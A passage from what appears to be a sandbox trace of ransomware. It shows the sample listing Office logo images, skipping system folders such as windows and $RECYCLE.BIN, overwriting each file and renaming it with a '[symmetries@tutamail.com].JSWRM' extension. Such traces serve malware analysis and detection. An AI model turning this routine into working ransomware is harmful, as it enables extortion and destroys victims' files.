lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0133.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-180.png", cchWideChar=23, lpMultiByteStr=0x240f48, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 23 [0133.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.868] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3810) returned 1 [0133.868] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.868] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xee0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xee0, lpOverlapped=0x0) returned 1 [0133.895] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.895] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xee0, lpOverlapped=0x0) returned 1 [0133.909] CloseHandle (hObject=0x238) returned 1 [0133.909] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.912] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x88b, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogo.scale-80.png", cAlternateFileName="VI2F4A~1.PNG")) returned 1 [0133.912] lstrcmpiW (lpString1="VisioLogo.scale-80.png", lpString2=".") returned 1 [0133.912] lstrcmpiW (lpString1="VisioLogo.scale-80.png", lpString2="..") returned 1 [0133.912] lstrcmpiW (lpString1="VisioLogo.scale-80.png", lpString2="...") returned 1 [0133.912] lstrcmpiW (lpString1="VisioLogo.scale-80.png", lpString2="windows") returned -1 [0133.912] lstrcmpiW (lpString1="VisioLogo.scale-80.png", lpString2="recovery") returned 1 [0133.912] lstrcmpiW (lpString1="VisioLogo.scale-80.png", lpString2="perflogs") returned 1 [0133.912] lstrcmpiW (lpString1="VisioLogo.scale-80.png", lpString2="documents and settings") returned 1 [0133.912] lstrcmpiW (lpString1="VisioLogo.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.912] lstrcmpiW (lpString1="VisioLogo.scale-80.png", lpString2="system volume information") returned 1 [0133.912] lstrcmpiW (lpString1="VisioLogo.scale-80.png", lpString2="msocache") returned 1 [0133.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-80.png", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0133.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-80.png", cchWideChar=22, lpMultiByteStr=0x241330, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 22 [0133.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-80.png", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0133.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-80.png", cchWideChar=22, lpMultiByteStr=0x2410d8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 22 [0133.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.913] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2187) returned 1 [0133.913] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.913] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x880, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x880, lpOverlapped=0x0) returned 1 [0133.915] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.916] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x880, lpOverlapped=0x0) returned 1 [0133.916] CloseHandle (hObject=0x238) returned 1 [0133.916] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.917] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x790, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogoSmall.contrast-black_scale-100.png", cAlternateFileName="VI6631~1.PNG")) returned 1 [0133.917] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-100.png", lpString2=".") returned 1 [0133.917] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-100.png", lpString2="..") returned 1 [0133.917] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-100.png", lpString2="...") returned 1 [0133.917] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-100.png", lpString2="windows") returned -1 [0133.917] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-100.png", lpString2="recovery") returned 1 [0133.917] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-100.png", lpString2="perflogs") returned 1 [0133.917] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0133.917] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.917] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-100.png", lpString2="system volume information") returned 1 [0133.917] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-100.png", lpString2="msocache") returned 1 [0133.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-100.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-100.png", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 43 [0133.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-100.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-100.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 43 [0133.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.919] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1936) returned 1 [0133.919] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.919] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x790, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x790, lpOverlapped=0x0) returned 1 [0133.920] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.920] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x790, lpOverlapped=0x0) returned 1 [0133.920] CloseHandle (hObject=0x238) returned 1 [0133.921] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.922] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x899, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogoSmall.contrast-black_scale-140.png", cAlternateFileName="VI2462~1.PNG")) returned 1 [0133.922] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-140.png", lpString2=".") returned 1 [0133.922] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-140.png", lpString2="..") returned 1 [0133.922] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-140.png", lpString2="...") returned 1 [0133.922] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-140.png", lpString2="windows") returned -1 [0133.922] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-140.png", lpString2="recovery") returned 1 [0133.922] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-140.png", lpString2="perflogs") returned 1 [0133.922] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0133.922] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.922] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-140.png", lpString2="system volume information") returned 1 [0133.922] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-140.png", lpString2="msocache") returned 1 [0133.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-140.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-140.png", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 43 [0133.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-140.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-140.png", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 43 [0133.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.923] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2201) returned 1 [0133.923] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.923] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x890, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x890, lpOverlapped=0x0) returned 1 [0133.925] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.925] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x890, lpOverlapped=0x0) returned 1 [0133.925] CloseHandle (hObject=0x238) returned 1 [0133.925] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.930] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4f, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogoSmall.contrast-black_scale-180.png", cAlternateFileName="VI71F6~1.PNG")) returned 1 [0133.930] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-180.png", lpString2=".") returned 1 [0133.930] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-180.png", lpString2="..") returned 1 [0133.930] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-180.png", lpString2="...") returned 1 [0133.930] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-180.png", lpString2="windows") returned -1 [0133.930] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-180.png", lpString2="recovery") returned 1 [0133.930] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-180.png", lpString2="perflogs") returned 1 [0133.930] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0133.930] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.930] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-180.png", lpString2="system volume information") returned 1 [0133.930] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-180.png", lpString2="msocache") returned 1 [0133.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-180.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-180.png", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 43 [0133.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-180.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-180.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 43 [0133.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.931] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3151) returned 1 [0133.931] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.931] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xc40, lpOverlapped=0x0) returned 1 [0133.933] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.933] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xc40, lpOverlapped=0x0) returned 1 [0133.933] CloseHandle (hObject=0x238) returned 1 [0133.933] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.934] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogoSmall.contrast-black_scale-80.png", cAlternateFileName="VI602A~1.PNG")) returned 1 [0133.934] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-80.png", lpString2=".") returned 1 [0133.934] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-80.png", lpString2="..") returned 1 [0133.934] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-80.png", lpString2="...") returned 1 [0133.934] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-80.png", lpString2="windows") returned -1 [0133.934] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-80.png", lpString2="recovery") returned 1 [0133.934] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-80.png", lpString2="perflogs") returned 1 [0133.934] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0133.934] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.934] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-80.png", lpString2="system volume information") returned 1 [0133.934] lstrcmpiW (lpString1="VisioLogoSmall.contrast-black_scale-80.png", lpString2="msocache") returned 1 [0133.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-80.png", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0133.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-80.png", cchWideChar=42, lpMultiByteStr=0x22ce70, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) 